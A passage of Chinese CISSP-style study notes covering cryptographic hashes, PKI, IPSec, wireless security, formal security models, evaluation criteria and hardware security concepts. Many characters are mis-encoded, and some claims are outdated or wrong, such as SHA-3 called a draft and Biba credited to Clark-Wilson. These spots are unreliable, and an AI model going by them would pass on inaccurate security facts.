Variable Length)是变长散列,是MD5的修改版,使 用1024位的分组,产生128、160、192、224、256位的散列值。 8、SHA-1和SHA-2都是NIST开发的(FIPS 180)。SHA-1生成160位的消息 摘要,处理512位的分组,明文不够512就会被填充。 9、SHA-2有四个变种:SHA-224、SHA-256、SHA-384、SHA-512。后面那 个数就是散列的长度,前两个处理512位的分组,后两个处理1024位的分 组。 10、2012年,美联邦政府宣布选择Keccak作为SHA-3标准,仍然处于草案 形式。 11、MD2是Ronald Rivest与1989年开发的,128位分组输入,生成128位消 息摘要,后被证明不是单向函数。 12、MD4是1990年Rivest MD2的增强版,需要填补信息以确保信息的长度 减去448后能被512整除(信息比特位长度mod 512 = 448,这样,如果是 16位的消息,就要用432比特的附加数据填充),分组处理产生128位摘 要。被人在1996年发现可以在一分钟内找到冲突,所以不安全。 13、1991年,Rivest发布MD5,有同样的填充需求,128位的输出。近年 来的密码分析攻击已经证明 MD5 协议会产生冲突,这表明它不是一种 单向函数。特别地,Aijien Lenstra 和其他一些人在 2005 年证明了使用不 同的公钥能够创建两个具有相同 MD5 散列的数字证书。 14、数字签名就是用自己的私钥加密消息的摘要。不ᨀ供机密性,只ᨀ 供完整性和不可否认性。 15、HMAC保证了完整性,但不ᨀ供不可否认性(因为用共享的对称密钥 加密)。 16、数字签名标准(DSS)在FIPS 186-4中ᨀ出,指定美国联邦政府批准 的所有数字签名算法都要用SHA-2散列函数,加密算法有三种: DSA(数字签名算法)、RSA算法、椭圆曲线数字签名算法ECDSA。 17、还有两种数字签名算法:Schnorr算法、Nyberg-Rueppel算法。知道 名字即可。 18、数字证书就是个人公钥的被认可副本。如果是被可信CA颁发的,人 们就信任这个公钥。数字证书的格式为国际标准X.509(尚不是正式标准, 是事实标准,各厂商实现略有差异),里面有版本号、序列号、签名算 法标识符(CA用的签名算法)、发布者姓名(CA的身份标识)、有效期、 主体的名字、主体的公钥。 19、 X.509版本3支持证书扩展,出了上述内容外,可以定制其他变量。 20、证书授权机构CA,主要有symantec、GlobalSign、Comodo、 GoDaddy、Entrust、Geotrust等;如果浏览器信任一个CA,就会自动信任 该CA颁发的所有证书。 21、注册授权机构RA,在证书发布之前帮助CA验证用户的身份。 22、证书路经验证(Certificate Path Validation,CPV),从原始起点至相 关服务器或者客户端的证书路经中的每个证书都应当考虑是否有效与合 法。 23、证书从生成到撤销的过程: 注册:携带身份标识文件前往CA的代理处,一旦身份验证通过, 你就ᨀ供公钥,CA就给你证书。 验证:使用时,对方会验证CA的签名,而且要检查确保证书没有 公布在CRL中。最重要的是:证书中确实包含了需要让人信任的数据,比 如名字。 撤销:CA会因为以下原因撤销证书:证书所有者丢失了私钥、 证书被错误发放(身份信息没有被正确验证),主体名字发生变化了, 主体的组织机构不再和主体关联。 24、有两种技术验证证书是否被撤销:CRL,包含证书的序列号以及撤销 的时间,需要定期下载,所以会有一段时间的延迟。联机证书状态协议 (OCSP):这种方式可以ᨀ供实时证书验证,实时向OCSP服务器发送 OCSP请求。 25、关于对称密钥管理:密钥长度、真随机、密钥过一段时间要换、备 份密钥(以防密钥损坏)。 26、1991年,PGP出现,结合了“web of trust”概念,有两个版本,商业 版本使用RSA/IDEA/MD5。免费版本使用DH/CAST(128位加密)/SHA-1。 27、安全多用途互联网邮件扩展(Secure Multipurpose Internet Mail Extensions,S/MIME)看上去要成为事实上的标准,outlook、thunderbird、 Mac OS X Mail都支持。使用X.509/RSA/AES/3DES,主流的桌面软件都支 持S/MIME,但基于web的邮件系统都不支持(需要浏览器扩展)。 28、SSL的一个主要过程是浏览器创建一个对称密钥,用服务器的公钥加 密后发给服务器。2014年,由于贵宾犬POODLE攻击,很多机构完全放弃 了对SSL3.0的支持。TLS获得了SSL3.1的昵称。 29、隐写术(steganography)通常在图像或wav文件内嵌入秘密消息。 iSteg是一个免费工具,能在图片上嵌入信息。 30、数字版权管理(DRM)普遍失败,因为用户把它看成一种Intrusive和 Obstrutive。比如在音乐中使用DRM主要是订阅服务,例如Napster和 Kazaa,订阅结束后,用户无法访问已下载音乐。用户更喜欢DRM-free。 在音乐、电影、电子书、游戏、文档等方面都有相应的DRM技术。 31、所有DRM方法都有一个致命缺陷,访问内容的设备必须获得解密密 钥,如果密钥出现在终端用户这里,用户总是有机会获得密钥。Adobe的 ADEPT(数字体验保护技术)保护电子书,使用AES加密并使用RSA保护 AES密钥。Kindle也有自己的加密技术。 32、对于文档保护而言,DRM方案主要控制如下权限:阅读、修改、去 水印、下载、打印、截图。这些权限可以授予、撤销、可以在过期后自 动失效。 33、网络加密有两种:链路加密、端到端加密(end to end),关键差异 在:对于链路加密,包含头、尾的所有数据被加密。所以在每一跳都要 解密和加密。端到端加密不加密头、尾、地址和路由信息;端到端是OSI 模型中较高层次的加密,链路加密是底层加密。SSH就是个很好的端到端 加密的例子,这组程序ᨀ供了FTP、Telnet、rlogin的加密可选方案。 34、尽管IPSec一般被用于连接两个网络,但也可以被用于连接两个单独 的计算机。IPSec不规定所有的实现细节。IPSec主要被用于VPN,可以工 作在运输模式或隧道模式中,通常和L2TP一起使用。 35、AHᨀ供消息完整性和不可否认性。ESPᨀ供机密性和完整性。都可以 防重放。ESP可以在没有AH的情况下使用,但AH几乎不会单独使用。 36、传输模式下,包头不加密,只加密有效载荷,为peer to peer通信设 计。在隧道模式下,整个数据包都会被加密,外面加新包头,这种模式 为网关间通信而设计。 37、创建安全关联SA后就会有IPSec通道,SA代表会话,并记录和会话相 关的参数,而且仅代表一个单向的连接,如果要双向通信,就需要两个 SA。如果希望使用AH和ESP的双向通道,就需要4个SA。 38、IPSec的最大优点来自于能够在每个SA的基础上过滤和管理通信,可 以管理客户端和网关之间的SA上,规定哪些协议可以使用IPSec通道。没 有SA,就没有安全通道。 39、网络安全关联密钥管理协议(ISAKMP)通过协商、建立、修改和删 除SA为IPSecᨀ供后台的安全支持服务。ISAKMP在RFC2408中ᨀ出,主要 实现4个目标: 身份认证、建立SA、密钥建立、防止遭受威胁(重放和拒绝服务攻 击)。 40、ISAKMP没有定义任何密钥交换协议的细节,也没有定义任何具体的 加密算法、密钥生成技术或者认证机制。这个通用的框架是与密钥交换 独立的,可以被不同的密钥交换协议使用。ISAKMP报文可以利用UDP或 者TCP,端口都是500,一般情况下常用UDP协议。 41、IKE是一种混合型协议,由RFC2409定义,包含了3个不同协议的有关 部分:ISAKMP、Oakley和SKEME。IKE和ISAKMP的不同之处在于:IKE真正 定义了一个密钥交换的过程,而ISAKMP只是定义了一个通用的可以被任 何密钥交换协议使用的框架。 42、WEPᨀ供64位和128位的加密选项,有显著的缺陷。 43、WEP的缺点: 1.本身没有防重放的能力。 2.使用CRC作为认证码并不能起到很好的防篡改能力。 3.初始向量IV长度为24位,并且通常是通过计数器实现的,所以IV经常 会会重复。 4.RC4密钥调度算法存在缺陷,使得该加密算法存在弱密钥,由于IV附 加在密钥SK前面做为RC4的密钥输入,攻击者可以等待一个由IV产生的弱 密钥,并进而攻击获得SK。 44、WPA是一个临时的解决方案,使用WEP的硬件,但软件变了,加密 算法使用临时密钥完整性协议(TKIP),消除了WEP的密码学弱点。 45、在WPA2中,AES替换了TKIP。 46、需要记住的是,WPA 并不提供端到端的安全解决方案。WPA 只对笔 记本电脑和最近的无线接入点之间的传输数据进行加密。一旦传输数据 到达有线网络,数据就会被解密。 47、WPA被设计为与802.1x身份认证服务器进行交互。主要是可以通过 802.1x的认证建立起密钥。 48、IEEE802.1x为有线和无线网络中的身份认证和密钥管理ᨀ供架构,客 户端运行称为supplicant的软件,与身份认证服务器通信,通过后,交换 机和AP就允许客户端访问网络。WPA与802.1x身份认证服务器交互。 49、WPA2 有两种风格:WPA2 个人版和 WPA2 企业版。WPA2 企业版需 要一台具有 IEEE 802.1X 功能的 RADIUS 服务器。 没有 RADIUS 服务器的用户可以使用 WPA2 个人版。 50、密码学攻击:几种方法: 分析攻击:关注算法本身的逻辑性 实现攻击:利用实现的弱点,关注对软件代码的利用。 统计攻击:利用统计弱点(比如并非真随机数、浮点错误,以及底 层硬件或操作系统的漏洞) 蛮力攻击:穷举爆破。可以利用彩虹表,可以用一些专用硬件。 51、密码分析的一些类型: 仅知密文时,一般会搞频率分析。E、T、O、A、I、N频率最高,比如 移位密码不改变频率,如果其他字母频率高,很可能是置换密码。 已知明文(known plaintext),分析者有一些密文及其明文。 但不 能选任意密文。 选定密文(chosen ciphertext),选定密文可以得其明文。 选定明文(chosen plaintext),选定明文可以得其密文。 52、中间相遇攻击(meet in the middle)导致2DES被攻破。 53、生日攻击也被称为冲突攻击,攻击者可以在通信中篡改明文,但维 持原有签名的有效性。 第8章 安全模型的原则、设计和功能 1、主体是访问资源的用户或进程,客体是用户和进程要访问的资源。 2、封闭式系统很难和别的系统集成,但更安全。 3、开放式系统集成起来较容易,但由于开放,存在许多发动攻击的入口 点和方法,也会引起更多的关注,共享的知识和经验也更多。 4、闭源的程序即可是开放式系统(MAC),也可以是封闭式系统。开源 也可能是封闭系统,关键看是不是开放接口。 5、确保CIA的几种技术: 限制(confinement):限制进程只能在确定的内存地址和资源中读取 和写入数据,也即沙箱。可以在操作系统里面做限制,也可以在应用里 面做(sandboxie)、或虚拟机hypervisor里面做(VirtualBox) 界限(bounds): 每个进程都可能在用户级或内核级,可以由操作 系统实施逻辑界限,也可以从物理上将进程和进程的内存区域隔开,这 昂贵但安全。 隔离(Isolation):通过将进程限制在界限里,就实现了隔离。防止 某个程序访问只属于另一个应用程序的内存或资源。操作系统ᨀ供中间 服务如剪贴板。 6、强制访问控制MAC(Mandatory Access Control)是根据主体和客体的 静态特性来定义是否可以访问的,比如RBAC就是MAC的一种:规则型访 问控制(Rule-Based Access Control,RBAC)在规则中说明了哪种主体可 以访问哪种客体。 7、自主访问控制(Discretionary Access Control):在一定的限制下,主 体具有定义访问客体的能力。 8、MAC和DAC都限制主体对客体的访问。访问控制的主要目的是:通过 阻止授权或未经授权主体的未授权访问,从而确保数据的机密性和完整 性。 9、可信(Trust)和保证(Assurance):安全性一旦被设计,就要被工 程(engineered)、实现、测试、审计、评估(Evaluated)、认证 (Certified,第三方测评)和最终认可(Accredited)。 可信(Trust)是指所有保护措施可以协同工作以便用户能在一个稳定 和安全的环境下处理敏感数据。 保证(Assurance)是指满足安全需求的信心度(degree of confidence),必须被不断的维持、更新和重新验证(reverified)。 10、关于验证(Verification)与确认(Validation)有人说,验证是功能测试, 确认是验收测试(集成测试)。 11、变化是安全的对立面,并且常常降低安全性,无论何时发生变化, 都要对系统重新评估。 12、可信计算基:美国国防部DoD的橘皮书将TCB᧿述为硬件、软件和控 制方法的组合。TCB是完整信息系统的一个子集,应当尽量小。 TCB是系统信任的(遵守和实施安全策略的)唯一部分。 13、TCB负责控制对系统的访问,TCBᨀ供访问TCB内部或外部资源的方 法。TCB的责任是确保系统的行为在任何情况下都是遵从安全策略的。 14、操作系统的内核由软件、硬件和固件组成,因此从某种意义上说, 内核就是 TCB。然而,TCB 还可能包括其他组件,如能够直接与内核进 行交互的可信命令、程序和配置文件。可信路径(musted path)是用户 或程序与内核之间通信通道。比如chmod,可以理解为环0,1,2。 15、安全边界(perimeter)将TCB和其他部分隔开(这是一个概念上的边 界),TCB要与系统的其他部分通信时必须建立安全的通道,这被称为可 信路径(trusted paths)。系统通过可信路径向用户交付高级别的安全性 (B2及较高级别要求使用可信路径)。 16、引用监控器是TCB的访问控制执行者,处于主体和客体之间,在准许 进行任何访问控制之前,TCB的引用监控器都验证主体的凭证是否满足访 问客体的需求,这个引用监控器也是一个概念,并不是一个实际的系统 组成部分。TCB可以选用任意的他想要的安全模型。 17、共同工作从而实现引用监控器功能的 TCB 中组件的集合被称为安全 内核。安全内核的目的是使用适当的组件实施引用监控器的功能和抵抗 所有已知的攻击。安全内核使用一条可信路径与主体进行通信,并且还 可以作为所有资源访问请求的中间人,只允许那些与系统应用的适当访 问规则相匹配的请求。 18、状态机模型,该模型᧿述了一个无论何时总是处于安全状态(满足 安全策略的要求)下的系统,基于有限状态机(Finite State Machine, FSM)。 下一状态=F(输入,当前状态),如果每个状态都是安全的,那么系 统就是安全状态机。 19、信息流模型,BLP(Bell-LaPadula)和Biba模型都是信息流模型。不 管主体和客体是不是在一个分类级别上,信息流模型都可以防范未授权 的信息流。 通过排除所有未定义的信息流途径,可以防范隐蔽通道。 20、无干扰模型(Noninterference model),这个模型松散地建立在信息 流模型的基础上,说的是位于高安全级别的主体A的动作不应当影响低安 全级别主体B的动作,甚至不引起主体B的注意,其实更关注的是,A的行 为不能影响低安全级别的系统状态,否则,B将会演绎推导出高分类级别 的信息,这会涉及到隐蔽通道的问题。可以用这种模型设计防范木马。 21、信息流模型可能是构建在多个系统上,系统之间组合论有三种形式: 级联(cascading)、反馈(feedback)、挂接(hookup),(向多个系 统发送输入) 22、Take-Grant模型,采用有向图指示权限如何转移,简单的说, 1、具有授权资格的主体可以向另一个主体或客体授予其所拥有的其他 任何权限。 2、具有获得权限能力的主体可以从另一个主体获得权限。 23、访问控制矩阵:由主体和客体组成的表,指示了每个主体可以对每 个客体执行的动作。矩阵的每一行都是功能列表,每一列都是访问控制 列表。 24、从管理上看,只使用功能列表是很恐怖的,如果去除了一个特定客 体,就要改动每个主体的功能列表。可以理解为: 只有功能列表,删人简单,删东西麻烦。只有ACL,删东西简单,删 人麻烦。 25、下图这种访问控制矩阵,适用于自主访问控制DAC,通过简单对主 体分类(自己、同组、所有人),就可以构造强制性或规则型矩阵,系 统可以快速判断主体是否得到授权。 26、BLP模型:DoD在1970年代开发了Bell-LaPadula模型,BLP是多级安全 (multilevel )策略的首个数字模型,专注于维护客体的机密性,适用于 军事组织。 缺点:BLP并没有说明完整性和可用性方面的内容。也没有涉及隐蔽通 道问题。 27、BLP模型以状态机概念和信息流模型为基础。还采用MAC和格子型概 念。格子型访问控制也是信息流通用类别,也是解决机密性问题。 28、BLP(不能上读下写) 属性:简单安全属性:不能上读(不能读取较高敏感级别的信息)。星 安全属性:不能下写(不能往较低敏感度级别的客体上写信息,比如在 非机密文档中写下了绝密备注)。自主安全属性:系统使用访问控制矩 阵来实施自主访问控制。 29、BLP有个例外,就是“受信任的主体”(trusted subject)不受星安全 属性的约束。因为受信任主体被定义为“即使可能出事也不会出事”的 主体,这在对客体解除分类或降低分类时有用(比如clearing)。 30、对于商业组织(非军事组织)来说,完整性比机密性更重要,由 Biba和Clark-Wilson开发了Biba模型,就是保护数据的完整性的。 31、Biba(不能下读上写) 属性:简单完整性属性:不能下读。星完整性属性:不能上写。 (注意简单属性是读,星属性是写)。可以把完整性想成空气的纯净级 别。 缺点:不解决机密性和可用性问题,没有防止隐蔽通道。OSGT:只关 注客体不受外部威胁,假定内部威胁已经被有计划的控制。 32、记忆:BLP不上读下写,Biba不下读上写。 33、Clark-Wilson模型从设计上比Biba更适合商业模型,C-W模型并不使用 格子型结构,也不使用状态机,而是使用“主体/程序/客体”这样的三 元组,主体只能通过程序访问客体,使用两条原则:良好的事务处理、 职责分离。C-W模型保护完整性。 34、主体只能通过使用程序、接口或访问门户来访问客体。接口对可以 对客体做什么和不可以对客体做什么施加了特定的限制。这有效地限制 了主体的能力。这被称为约束接口。如果程序设计正确,那么三元组关 系就ᨀ供了保护客体完整性的方法。 35、约束数据项(constrained data item,CDI)是模型要保护的数据项; 非约束数据项UDI是不受安全模型保护的数据项; 完整性验证过程IVP扫描CDI并确定其完整性; 转换过程(Transformation Procedure,TP)是允许更改CDI的唯一过程。 通过TP限制对CDI的访问形成C-W的主干,C-W使用安全标签授予对客体 的访问权限,但是只能通过转换过程和受限接口模型完成,接口向不同 分类的主体展示不同的信息(比如用户没有某个功能的权限,菜单上就 看不见或者变灰)。Clark-Wilson模型的设计使其成为一种适于商用的优 秀模型。 36、Brewer and Nash模型(也叫Chinese Wall模型),主要致力于解决利 益冲突,如果A公司和B公司存在竞争,C公司的人可以访问A公司的数据, 但因此就不能访问B公司的数据。中国墙模型就像是在冲突安全域之间竖 起了墙,如果一个主体正在访问某个安全域,那它就不能访问属于相同 冲突类的其他安全域。 37、OSGT:Brewer and Nash模型的目的:访问控制可以基于用户以前的 活动而动态改变,所以这也是一种状态机模型。比如:管理员对系统中 的大量数据拥有完全的访问控制,然而,在对任何数据项采取行动时, 管理员对冲突数据的访问都会被暂时阻止。一旦任务完成后,管理员的 访问将返回到完全控制。 38、Goguen-Meseguer 模型是一个完整性模型,尽管它不如 Biba 和其他 模型有名。实际上,这个模式被称作非干涉概念理论的基础,通常当某 人讲非干涉模型时,他们实际指的是 Goguen-Meseguer 模型。 39、Sutherland 模型是一个完整性模型。它的重点是预防对完整性支持的 干扰。 40、Graham-Denning 模型关注主体和客体在创建和删除时的安全性。 41、购买信息系统的人,通常只愿意考虑已经正式评估(evaluation)了 的系统,评估通常是雇佣第三方来执行的。测评的结果是看系统达到什 么标准,并给一个认证标志(seal of approval)。一般有两步,第一步是 测试和评估看是否满足了使用所需的安全标准,第二步是对系统的设计 和实际的功能性能比较,并决定是否采用这个系统。OSGT:把第三方的 这种保证称为*Verification*。注意了,Verification是对标检查的。 42、DoD在80年代推出了用于评估计划购买的信息系统的可信计算基评 估标准(TCSEC),即彩虹系列(最早是橘皮书,后来添加了其他颜色), 已经被废除。 43、90年代,欧盟的ITESC在TCSEC的基础上被开发出来,后来都被通用 准则(CC)所代替。TCSEC的最高保护级别是A1级,A1系统被设计用于 处理绝密数据。 A1级(已验证级别) B3、B2、B1级(强制性保护) C2、C1级(自主性保护) D级(最小化保护) 44、TCSEC的问题: 1、它考虑控制用户对信息的访问,但没有控制用户一旦获取权限后, 如何对信息处理。 2、重点完全在于机密性。 3、并不仔细处理人员、物理和过程化的策略问题或防范措施。 4、橘皮书本质上并不处理网络连接问题,尽管之后的红皮书处理。 45、ITSEC将正在评估的系统作为评估目标(target of Evaluation,TOE), 主要是评估系统的“功能性”和“保证”(也即系统的可信赖程度)。 1、ITSEC除了机密性,还关注完整性和可用性; 2、ITSEC并不依赖TCB的概念; 3、ITSEC在系统发生变化后不要求新的正式评估,而是只是维护评估目 标(而TCSEC要求发生变化的系统都要重新评估)。 46、通用准则CC(Common Criteria)是全球性的标准,要认识到,即使 是最高的CC等级,也不等同于系统绝对安全。 47、CC的主要目标: 1、增加购买者对划分等级的产品的安全性的信心; 2、消除重复评估; 3、使安全评估更有效率; 4、使评估遵循高且一致的标准; 5、推动评估发展; 6、评估TOE的功能性和保证。 48、CC基于两个关键元素:保证轮廓(Protection Profiles,PP)和安全目 标(Security Targets,ST), 1、PP指定了TOE的安全需求和保护(客户的“I want”), 2、ST指定了TOE内建的安全声明(供应商的“I will provide”), 3、将PP与ST比较,最接近的就是客户要购买的。 49、CC有三部分: 1、第一部分是介绍和一般模型᧿述(Introduction and General Model) 2、第二部分是安全功能需求(Security Functional Requirement) 3、第三部分是安全保证(Security Assurance) 50、CC评估保证级别: EAL1 功能测试 Functionally tested EAL2 结构测试 Structurally tested EAL3 系统地测试和检查 Methodically tested and checked EAL4 系统地设计、测试和回顾 Methodically designed, tested, and reviewed EAL5 半正式设计和测试 Semi-formally designed and tested EAL6 半正式验证、设计和测试 Semi-formally verified, designed, and tested EAL7 正式验证、设计和测试 Formally verified, designed, and tested 51、CC的缺点: 1、没有包含对原位置安全性(security in situ)的评估,也就是说不涉 及与人员、组织的实践和措施或物理安全相关联的控制; 2、也没有解决对电磁辐射的控制; 3、不存在明确的对密码学算法强度的等级评定。 52、除了通用的CC标准,还有行业和国家安全实施指南,比如PCI-DSS, 再比如ISO系列标准。 53、正式评估过程(主要在竣工验收时用)分为两个阶段:认证 (Certification)和鉴定(Accreditation,认可)。认证过程给鉴定过程ᨀ 供支持。 54、认证(Certification)是对IT系统的技术和非技术安全特性以及其他 防护措施的综合评估。主要是对系统的每个部分进行技术性评估,看与 安全标准是否一致。选择好标准后,要测试软件、硬件、配置(这些内 容一旦有变,认证都会无效),物理控制、技术控制、行政管理控制都 要被评估到(认证是一个全面的考察过程)。这可以不是第三方做的。 55、管理部门通过鉴定(Accreditation)过程来接受(acceptance)一个 系统,管理层将认证结果(也即系统的安全能力)和组织的需求进行比 较,如果确定系统符合组织的要求,那么就通过鉴定。鉴定由指定许可 机构(Designated Approving Authority,DAA)作出的正式声明,鉴定一 旦完成,管理层就正式接受系统了(包括它的安全性和风险)。鉴定是 请外部专家的,领导参加,全体认可的。 56、认证和鉴定是不断重复的过程,系统只要更改了配置,就要进行重 新的认证,安全策略应当明确什么样的情况需要重新认证,并列出认证 的有效时间。 57、有两种政府标准适用于计算机系统的认证和鉴定:一、国防部标准 是:风险管理框架RMF,它取代了国防部信息保障认证认可过程DIACAP 和国防部信息技术安全认证认可过程DITSCAP;二、其他所有政府行政部 门是:国家安全系统委员会策略Committee on National Security Systems Policy (CNSSP) 58、RMF和CNSSP都分为4个阶段:1:定义 2:验证(verification) 3:确认 (validation) 4:后鉴定(post accreditation),针对三种类型: system(evaluate某个系统) site(含它所在的自包含物理位置) type(评估分布在许多不同位置的系统) 60、TPM(Trusted Platform Module)即是一个通用的名称,具体到一个场 景来说,也就是主板上的加密处理芯片,主要⬀储和处理密钥,实现基 于TPM的全盘加密。 61、硬件安全模块(hardware security module,HSM)⬀储密钥,加密, 签名,通常是附加的一个硬件适配器,TPM可以看作是一种HSM。很多 系统使用HSM⬀储证书;ATM和POS终端有专用的HSM;兼容DNSSEC的 DNS服务器使用HSM提供密钥和区域文件(zone file)⬀储。 第9章 安全脆弱性、威胁和措施 1、更多的复杂性意味着存在更多漏洞的区域。 2、多任务(multitasking)不代表多处理(Multiprocessing),多处理有 多个处理器,可以是对称的多处理(Symmetric Multiprocessing,SMP) 或者大规模并行处理(Massively Parallel Processing,MPP),SMP的多个 处理器共享操作系统、数据总线和内存(以前是多CPU,现在是双核、四 核处理器),MPP系统有数百个处理器,每个处理器都有自己的操作系 统、总线和内存。 3、多程序(Multiprogramming)和多任务非常相似,是一种执行多个进 程的方式,在大型机中使用,需要特别编写的软件。 而多任务在windows和linux等个人计算机操作系统上使用,由操作系 统自动协调多任务。 4、多线程(Multithreading)允许在单个进程中执行多个并发任务,主要 是为了避免频繁的上下文切换带来的过大开销。一个进程中线程间转换 之需要40~50条指令,而进程到进程的转换开销为1000条指令,而且还 需要转换大量内存空间。 5、word的每个文档是一个线程。SMP可以向每个处理器发送一个线程去 执行。 6、单一状态处理器一次只在一个安全级别运行,多态处理器可以同时在 多个安全级别运行。 7、1963年至1969年间Bell实验室、MIT和GE合作设计和建设的Multics, 导致产生了复杂程度较低的Unix,并且带来了保护环的概念,现在一般 是4环,Multics设计的是7环。 环0是内核, 环1是OS组件, 环2是I/O驱动程序和系统实用程序, 环3是用户级程序。 环0~2在特权模式(监管模式)下运行,环3在用户模式下运行。 8、进程如果在就绪状态,如果CPU可用,就会转入运行状态(也称问题 状态);运行状态如果时间片到期进入就绪状态; 等待状态在等待某种资源(也即因为某些原因阻塞); 进程要求高特权(环3以上)时进入监管状态; 进程结束或者发生错误或者资源不可满足进入停止状态。 7、美国政府为处理分类信息的系统指派了4种被批准的安全模式:专用 模式、系统高级模式、分隔模式、多级模式。 8、专用模式(dedicated):访问系统用户都有要访问所有信息的级别 (clearance),被批准可以访问所有,need to know全部信息。 比如:过去设计的许多军事系统都只处理一种安全级别(比如 secret),这些系统就工作在专用安全模式之下。要访问系统上的任何数 据或所有数据,就要求每个使用该系统的用户都拥有最高许可级别。 9、系统高级模式(system high):访问系统用户都有要访问所有信息的 级别(clearance),虽然可以访问所有,但这次只能访问need to know的 信息。 比如:这台计算机上只有秘密级别,要求每个使用该系统的用户都拥 有最高许可级别。然而,尽管一个用户也是秘密级的,但如果没有与特 定客体对应的“知其所需”,那么他仍然可能会受到限制。 10、分隔模式(Compartmented):访问系统用户都有要访问所有信息 的级别(clearance),被批准只能访问部分,且这次只能访问need to know部分信息。 比如:如果系统中保存有秘密和绝密信息,那么所有用户必须至少拥 有绝密许可才能访问该系统。 11、多级模式(Multilevel Secure):访问系统的用户有不同的级别 (clearance), 被批准访问所需部分,need to know部分信息。又称 受控安全模式(controlled security mode)。 比如:如果一个系统允许同时处理两个或几个信息分类级别,但并非 所有用户都拥有访问系统处理的全部信息所需要的许可或正式批准,那 么表示该系统在多级安全模式(multilevel security mode)。BLP就是多级 安全模型的一个示例。OSGT:同时处理多个级别。 12、这四种模式的处理多许可级别数据(process data from multiple clearance levels,PDMCL)的能力是不同的,前两者无此能力,后两者有 此能力。 13、理解:被批准访问所有,就是说从总体上(长期)来说,所有信息 都可以访问的。但对于单次来说,只能访问need to kown的。而后两种模 式,一个用户本来就不被允许访问所有的。 14、处理器本身支持两种模式:用户模式(CPU在这种模式下只能执行 部分指令)和特权模式(可以执行CPU所支持的完整指令,也叫监管模式、 系统模式、内核模式)。 15、ROM就是出厂时被烧入(burned in)的只能读但不能写的存储器, 通常放一些bootstrap信息,包括自检程序(POST,power-on self-test)。 16、PROM(可编程只读存储器)本质上和ROM一样,一旦被烧入就不能 再改,但PROM出厂时不烧,允许用户稍后烧入。用于需要定制功能的硬 件开发。 17、EPROM(Erasable PROM,可擦写可编程只读存储器),EPROM芯片 上有个小窗口,用紫外线照射时就可以擦除。 18、EEPROM(电可擦除),通过芯片引脚上的电压来擦除。一擦就整个 芯片被擦。 19、闪存(Flash Memory),是EEPROM的衍生概念,非易失存储介质, 电子擦除和重写。可以按块(block)或页(page)来擦。最常见是NAND 闪存。 20、RAM(随机存取存储器,和顺序存取的磁带等设备相对应),可读 可写,有电才能保存。有real memory(实际存储器或主存储器)和cache memory。 21、高速缓存RAM能ᨀ高性能,1级缓存和2级缓存在主板上不同的芯片 中, 计算器先到1级缓存里去找想要的数据。 1级缓存缓存2级缓存里的内容, 2级缓存缓存主存储器里面的内容, 主存储器通常缓存磁盘里面的内容。 22、高端的打印机包含非常大的 RAM 高速缓存,这样操作系统可以快 速假脱机一项作业给打印机,并且随后可以忘记这个打印作业,也不必 等待打印机对所有的请求产生输出结果。打印机可以预处理来自主板高 速缓存的信息,从而释放计算机和操作系统继续执行其他任务。 23、RAM有两种, 动态RAM由电容器保持电荷,由于可能放电,需要CPU花费时间刷新其 内容。 静态RAM不需要刷新,而且速度快,但比DRAM贵。 24、寄存器为CPU的算术逻辑单元ALUᨀ供可以直接访问的存储位置。 25、寻址: 寄存器寻址:数据直接在寄存器里,比如直接从“寄存器1”里读取值。 立即寻址:事实上是引用数据的方法,比如“将寄存器1中的数与2相加”; 直接寻址:direct,要访问的存储器的实际地址ᨀ供给CPU; 间接寻址:indirect,存储器地址中包含了另一个存储器的地址; 基址+偏移量寻址:某个寄存器中的数值作为基址,然后加偏移量,得到存 储位置。 18、辅助存储器:磁介质、光学介质、FLASH这些不能由CPU直接获取数 据的存储。比主存储器(RAM)要便宜。 19、虚拟存储器由操作系统负责管理,最常见的类型是页面文件,包含 先前在内存中但近期并未使用的数据,操作系统访问页面文件中的地址 时,会看页面驻留在内存中还是被交换到磁盘中。主要缺点是:交换数 据时进行分页操作的速度相对较慢,微秒级的内存,毫秒级的磁盘,数 量级差3个。 20、存储器的安全问题:像DRAM和SRAM,断电后仍然有一段时间可能 保存电量。有一种冻结存储器芯片延迟数据衰减的攻击。 21、SSD在净化(sanitization)时有独特的问题,SSD有个损耗级别机制 (wear level),损耗大的块,会把自己的数据拷贝到损耗小的块,然后 自己被标识为“不存活“,那么,对于SSD而言,Zero wipe就不会有效, 就会有漏的数据。 22、HDD、SDD这类设备容易被盗,所以加密保护会比较好。 23、显示器的问题在于可以通过TEMPEST技术探测到电子辐射(Van Eck 辐射)。CRT辐射多,液晶辐射少。但对显示器的最大风险仍然是肩窥和 长焦相机。 24、打印机的安全风险: 1、打印出来的东西更容易被拿走; 2、共享打印机可能忘记或没有及时取回被人偷窥到; 3、打印机的本地存储数据; 4、打印机为了方便访问往往不是设计为安全系统。 25、键盘和鼠标都容易受到TEMPEST技术的监控,也可以被物理的监听 器装在键盘内部截获击键,无线鼠标和键盘的无线信号也能被截获。 26、系统中存在调制解调器往往是安全管理员最苦恼的问题之一。调制 解调器允许用户在网络内创建非受控的访问点。如果配置不正确,外部 人员可以突破保护机制直接访问网络资源。最糟糕的是,内部用户可以 使用它将数据泄漏到组织外部。 27、除非是出于商业原因而必须使用调制解调器,否则应当在组织的安 全策略中,考虑禁止使用调制解调器。安全管理人员应当了解所有调制 解调器在网络中的物理位置和逻辑位置,并确保它们被正确配置和给予 适当的保护措施以阻止非法使用。 28、旧式的外围设备没有自动配置和即插即用功能,手动配置涉及以下 三种操作: 存储映射I/O(memory mapped I/O),中断IRQ,直接内存访问DMA。 29、存储映射I/O:通过映射,CPU通过读取映射存储位置,实际上从相 应的设备中读取输入(这是因为在设备通知输入可用时,会在系统级自 动复制至这些存储位置)。同样,通过写入映射存储位置,实际上可以 将输出发送至相应的设备(在 CPU 通知输出可用时,在系统级将这些存 储位置的输出自动复制至相应设备)。从配置的角度看,确认只有一台 设备映射到某个特定的存储地址范围以及这个存储地址范围只用于处理 设备 IO 是非常重要的。从安全性的角度看,对映射存储位置的访问应当 由操作系统居间调停,并且应当得到正确的授权和访问控制。 30、中断IRQ:当某个设备希望为CPUᨀ供输入时,会在为其指派的IRQ上 发送信号,较新的符合PnP的设备可以共享单个中断,较老的不行。从安 全性的角度看,只有操作系统能够在足够高的特权级别间接访问 IRQ, 以便防止篡改或意外的错误配置。 31、直接内存访问DMA,设备直接写内存,不需要CPU协助,设备通过 DMR线通知CPU希望读写RAM,CPU授权由设备来控制总线并向RAM读写 数据,设备写完后,再通过DACK线通知CPU该过程结束。常用于硬盘、 光驱、显卡等与RAM的大量数据传输。从安全角度看,只有操作系统才 能调停DMA的分配以及DMA的使用。 32、固件(firmware):在主板上的BIOS算一种固件,用于启动计算机和 